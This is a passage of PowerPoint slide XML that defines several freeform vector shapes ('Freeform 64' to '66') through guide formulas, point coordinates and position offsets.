                    <a:gd name="T85" fmla="*/ 131 h 541"/>
                    <a:gd name="T86" fmla="*/ 127 w 569"/>
                    <a:gd name="T87" fmla="*/ 147 h 541"/>
                    <a:gd name="T88" fmla="*/ 116 w 569"/>
                    <a:gd name="T89" fmla="*/ 178 h 541"/>
                    <a:gd name="T90" fmla="*/ 116 w 569"/>
                    <a:gd name="T91" fmla="*/ 194 h 541"/>
                    <a:gd name="T92" fmla="*/ 121 w 569"/>
                    <a:gd name="T93" fmla="*/ 215 h 541"/>
                    <a:gd name="T94" fmla="*/ 142 w 569"/>
                    <a:gd name="T95" fmla="*/ 246 h 541"/>
                    <a:gd name="T96" fmla="*/ 190 w 569"/>
                    <a:gd name="T97" fmla="*/ 283 h 541"/>
                    <a:gd name="T98" fmla="*/ 279 w 569"/>
                    <a:gd name="T99" fmla="*/ 168 h 5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569" h="541">
                      <a:moveTo>
                        <a:pt x="289" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="393"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="389" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="410" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="447" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="299"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="400" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="536" y="231"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="568" y="331"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="541" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="488" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="347" y="540"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="321" y="535"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="519"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="436"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="64" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="32" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="189"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="53" y="78"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="358" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="405" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="431" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="367"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="231" y="136"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="231" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="211" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="174" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="162"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="246"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="190" y="283"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="168"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="13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9" name="Freeform 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7121525" y="5149850"/>
                  <a:ext cx="206375" cy="190500"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 226 w 574"/>
                    <a:gd name="T1" fmla="*/ 142 h 531"/>
                    <a:gd name="T2" fmla="*/ 189 w 574"/>
                    <a:gd name="T3" fmla="*/ 131 h 531"/>
                    <a:gd name="T4" fmla="*/ 158 w 574"/>
                    <a:gd name="T5" fmla="*/ 131 h 531"/>
                    <a:gd name="T6" fmla="*/ 147 w 574"/>
                    <a:gd name="T7" fmla="*/ 136 h 531"/>
                    <a:gd name="T8" fmla="*/ 132 w 574"/>
                    <a:gd name="T9" fmla="*/ 152 h 531"/>
                    <a:gd name="T10" fmla="*/ 121 w 574"/>
                    <a:gd name="T11" fmla="*/ 194 h 531"/>
                    <a:gd name="T12" fmla="*/ 121 w 574"/>
                    <a:gd name="T13" fmla="*/ 215 h 531"/>
                    <a:gd name="T14" fmla="*/ 132 w 574"/>
                    <a:gd name="T15" fmla="*/ 236 h 531"/>
                    <a:gd name="T16" fmla="*/ 179 w 574"/>
                    <a:gd name="T17" fmla="*/ 278 h 531"/>
                    <a:gd name="T18" fmla="*/ 247 w 574"/>
                    <a:gd name="T19" fmla="*/ 325 h 531"/>
                    <a:gd name="T20" fmla="*/ 320 w 574"/>
                    <a:gd name="T21" fmla="*/ 373 h 531"/>
                    <a:gd name="T22" fmla="*/ 352 w 574"/>
                    <a:gd name="T23" fmla="*/ 388 h 531"/>
                    <a:gd name="T24" fmla="*/ 378 w 574"/>
                    <a:gd name="T25" fmla="*/ 399 h 531"/>
                    <a:gd name="T26" fmla="*/ 420 w 574"/>
                    <a:gd name="T27" fmla="*/ 399 h 531"/>
                    <a:gd name="T28" fmla="*/ 436 w 574"/>
                    <a:gd name="T29" fmla="*/ 388 h 531"/>
                    <a:gd name="T30" fmla="*/ 452 w 574"/>
                    <a:gd name="T31" fmla="*/ 373 h 531"/>
                    <a:gd name="T32" fmla="*/ 463 w 574"/>
                    <a:gd name="T33" fmla="*/ 341 h 531"/>
                    <a:gd name="T34" fmla="*/ 452 w 574"/>
                    <a:gd name="T35" fmla="*/ 315 h 531"/>
                    <a:gd name="T36" fmla="*/ 441 w 574"/>
                    <a:gd name="T37" fmla="*/ 294 h 531"/>
                    <a:gd name="T38" fmla="*/ 378 w 574"/>
                    <a:gd name="T39" fmla="*/ 241 h 531"/>
                    <a:gd name="T40" fmla="*/ 457 w 574"/>
                    <a:gd name="T41" fmla="*/ 131 h 531"/>
                    <a:gd name="T42" fmla="*/ 530 w 574"/>
                    <a:gd name="T43" fmla="*/ 194 h 531"/>
                    <a:gd name="T44" fmla="*/ 567 w 574"/>
                    <a:gd name="T45" fmla="*/ 262 h 531"/>
                    <a:gd name="T46" fmla="*/ 573 w 574"/>
                    <a:gd name="T47" fmla="*/ 304 h 531"/>
                    <a:gd name="T48" fmla="*/ 552 w 574"/>
                    <a:gd name="T49" fmla="*/ 388 h 531"/>
                    <a:gd name="T50" fmla="*/ 525 w 574"/>
                    <a:gd name="T51" fmla="*/ 430 h 531"/>
                    <a:gd name="T52" fmla="*/ 463 w 574"/>
                    <a:gd name="T53" fmla="*/ 504 h 531"/>
                    <a:gd name="T54" fmla="*/ 426 w 574"/>
                    <a:gd name="T55" fmla="*/ 525 h 531"/>
                    <a:gd name="T56" fmla="*/ 383 w 574"/>
                    <a:gd name="T57" fmla="*/ 530 h 531"/>
                    <a:gd name="T58" fmla="*/ 289 w 574"/>
                    <a:gd name="T59" fmla="*/ 514 h 531"/>
                    <a:gd name="T60" fmla="*/ 231 w 574"/>
                    <a:gd name="T61" fmla="*/ 488 h 531"/>
                    <a:gd name="T62" fmla="*/ 163 w 574"/>
                    <a:gd name="T63" fmla="*/ 446 h 531"/>
                    <a:gd name="T64" fmla="*/ 52 w 574"/>
                    <a:gd name="T65" fmla="*/ 351 h 531"/>
                    <a:gd name="T66" fmla="*/ 22 w 574"/>
                    <a:gd name="T67" fmla="*/ 304 h 531"/>
                    <a:gd name="T68" fmla="*/ 5 w 574"/>
                    <a:gd name="T69" fmla="*/ 262 h 531"/>
                    <a:gd name="T70" fmla="*/ 5 w 574"/>
                    <a:gd name="T71" fmla="*/ 178 h 531"/>
                    <a:gd name="T72" fmla="*/ 22 w 574"/>
                    <a:gd name="T73" fmla="*/ 136 h 531"/>
                    <a:gd name="T74" fmla="*/ 48 w 574"/>
                    <a:gd name="T75" fmla="*/ 94 h 531"/>
                    <a:gd name="T76" fmla="*/ 111 w 574"/>
                    <a:gd name="T77" fmla="*/ 31 h 531"/>
                    <a:gd name="T78" fmla="*/ 179 w 574"/>
                    <a:gd name="T79" fmla="*/ 0 h 531"/>
                    <a:gd name="T80" fmla="*/ 216 w 574"/>
                    <a:gd name="T81" fmla="*/ 0 h 531"/>
                    <a:gd name="T82" fmla="*/ 299 w 574"/>
                    <a:gd name="T83" fmla="*/ 26 h 531"/>
                    <a:gd name="T84" fmla="*/ 263 w 574"/>
                    <a:gd name="T85" fmla="*/ 163 h 531"/>
                    <a:gd name="T86" fmla="*/ 226 w 574"/>
                    <a:gd name="T87" fmla="*/ 142 h 5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574" h="531">
                      <a:moveTo>
                        <a:pt x="226" y="142"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="189" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="126"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="158" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="173"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="121" y="215"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="257"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="247" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="399" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="420" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="357"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="325"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="294"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="278"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="457" y="131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="194"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="557" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="573" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="341"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="552" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="430"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="493" y="472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="463" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="514"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="52" y="351"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="304"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="262"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="178"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="136"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="48" y="94"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="74" y="57"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="111" y="31"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="179" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="336" y="47"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="163"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="142"/>
                      </a:ln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0" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="7196138" y="4975225"/>
                  <a:ext cx="249237" cy="217488"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 567 w 694"/>
                    <a:gd name="T1" fmla="*/ 367 h 604"/>
                    <a:gd name="T2" fmla="*/ 567 w 694"/>
                    <a:gd name="T3" fmla="*/ 367 h 604"/>
                    <a:gd name="T4" fmla="*/ 588 w 694"/>
                    <a:gd name="T5" fmla="*/ 409 h 604"/>
                    <a:gd name="T6" fmla="*/ 588 w 694"/>
                    <a:gd name="T7" fmla="*/ 424 h 604"/>
                    <a:gd name="T8" fmla="*/ 588 w 694"/>
                    <a:gd name="T9" fmla="*/ 446 h 604"/>
                    <a:gd name="T10" fmla="*/ 588 w 694"/>
                    <a:gd name="T11" fmla="*/ 446 h 604"/>
                    <a:gd name="T12" fmla="*/ 583 w 694"/>
                    <a:gd name="T13" fmla="*/ 488 h 604"/>
                    <a:gd name="T14" fmla="*/ 562 w 694"/>
                    <a:gd name="T15" fmla="*/ 530 h 604"/>
                    <a:gd name="T16" fmla="*/ 562 w 694"/>
                    <a:gd name="T17" fmla="*/ 530 h 604"/>
                    <a:gd name="T18" fmla="*/ 547 w 694"/>
                    <a:gd name="T19" fmla="*/ 556 h 604"/>
                    <a:gd name="T20" fmla="*/ 525 w 694"/>
                    <a:gd name="T21" fmla="*/ 577 h 604"/>
                    <a:gd name="T22" fmla="*/ 504 w 694"/>
                    <a:gd name="T23" fmla="*/ 593 h 604"/>
                    <a:gd name="T24" fmla="*/ 478 w 694"/>
                    <a:gd name="T25" fmla="*/ 603 h 604"/>
                    <a:gd name="T26" fmla="*/ 478 w 694"/>
                    <a:gd name="T27" fmla="*/ 603 h 604"/>
                    <a:gd name="T28" fmla="*/ 452 w 694"/>
                    <a:gd name="T29" fmla="*/ 603 h 604"/>
                    <a:gd name="T30" fmla="*/ 426 w 694"/>
                    <a:gd name="T31" fmla="*/ 603 h 604"/>
                    <a:gd name="T32" fmla="*/ 394 w 694"/>
                    <a:gd name="T33" fmla="*/ 593 h 604"/>
                    <a:gd name="T34" fmla="*/ 357 w 694"/>
                    <a:gd name="T35" fmla="*/ 571 h 604"/>
                    <a:gd name="T36" fmla="*/ 0 w 694"/>
                    <a:gd name="T37" fmla="*/ 367 h 604"/>
                    <a:gd name="T38" fmla="*/ 69 w 694"/>
                    <a:gd name="T39" fmla="*/ 241 h 604"/>
                    <a:gd name="T40" fmla="*/ 404 w 694"/>
                    <a:gd name="T41" fmla="*/ 435 h 604"/>
                    <a:gd name="T42" fmla="*/ 404 w 694"/>
                    <a:gd name="T43" fmla="*/ 435 h 604"/>
                    <a:gd name="T44" fmla="*/ 436 w 694"/>
                    <a:gd name="T45" fmla="*/ 451 h 604"/>
                    <a:gd name="T46" fmla="*/ 462 w 694"/>
                    <a:gd name="T47" fmla="*/ 451 h 604"/>
                    <a:gd name="T48" fmla="*/ 462 w 694"/>
                    <a:gd name="T49" fmla="*/ 451 h 604"/>
                    <a:gd name="T50" fmla="*/ 483 w 694"/>
                    <a:gd name="T51" fmla="*/ 441 h 604"/>
                    <a:gd name="T52" fmla="*/ 504 w 694"/>
                    <a:gd name="T53" fmla="*/ 420 h 604"/>
                    <a:gd name="T54" fmla="*/ 504 w 694"/>
                    <a:gd name="T55" fmla="*/ 420 h 604"/>
                    <a:gd name="T56" fmla="*/ 510 w 694"/>
                    <a:gd name="T57" fmla="*/ 404 h 604"/>
                    <a:gd name="T58" fmla="*/ 515 w 694"/>
                    <a:gd name="T59" fmla="*/ 388 h 604"/>
                    <a:gd name="T60" fmla="*/ 515 w 694"/>
                    <a:gd name="T61" fmla="*/ 372 h 604"/>
                    <a:gd name="T62" fmla="*/ 510 w 694"/>
                    <a:gd name="T63" fmla="*/ 362 h 604"/>
                    <a:gd name="T64" fmla="*/ 504 w 694"/>
                    <a:gd name="T65" fmla="*/ 346 h 604"/>
                    <a:gd name="T66" fmla="*/ 494 w 694"/>
                    <a:gd name="T67" fmla="*/ 330 h 604"/>
                    <a:gd name="T68" fmla="*/ 462 w 694"/>
                    <a:gd name="T69" fmla="*/ 309 h 604"/>
                    <a:gd name="T70" fmla="*/ 136 w 694"/>
                    <a:gd name="T71" fmla="*/ 120 h 604"/>
                    <a:gd name="T72" fmla="*/ 210 w 694"/>
                    <a:gd name="T73" fmla="*/ 0 h 604"/>
                    <a:gd name="T74" fmla="*/ 693 w 694"/>
                    <a:gd name="T75" fmla="*/ 277 h 604"/>
                    <a:gd name="T76" fmla="*/ 625 w 694"/>
                    <a:gd name="T77" fmla="*/ 398 h 604"/>
                    <a:gd name="T78" fmla="*/ 567 w 694"/>
                    <a:gd name="T79" fmla="*/ 362 h 604"/>
                    <a:gd name="T80" fmla="*/ 567 w 694"/>
                    <a:gd name="T81" fmla="*/ 367 h 6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694" h="604">
                      <a:moveTo>
                        <a:pt x="567" y="367"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="409"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="424"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="588" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="583" y="488"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="547" y="556"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="525" y="577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="478" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="426" y="603"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="593"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="571"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="367"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="69" y="241"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="404" y="435"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="451"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="483" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="420"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="404"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="388"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="515" y="372"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="510" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="346"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="494" y="330"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="462" y="309"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="120"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="693" y="277"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="625" y="398"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="567" y="367"/>
                      </a:ln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1" name="Freeform 66"/>
                <p:cNvSpPr>
